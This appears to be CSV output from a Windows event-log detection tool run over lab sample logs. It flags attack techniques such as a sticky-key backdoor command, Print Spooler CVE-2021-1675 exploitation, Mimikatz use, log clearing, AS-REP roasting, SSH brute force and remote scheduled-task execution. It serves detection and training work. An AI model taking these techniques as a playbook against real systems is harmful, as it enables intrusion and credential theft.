2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,-
2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx
2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx
2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx
2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx
2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx
2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx
2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx
2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx"
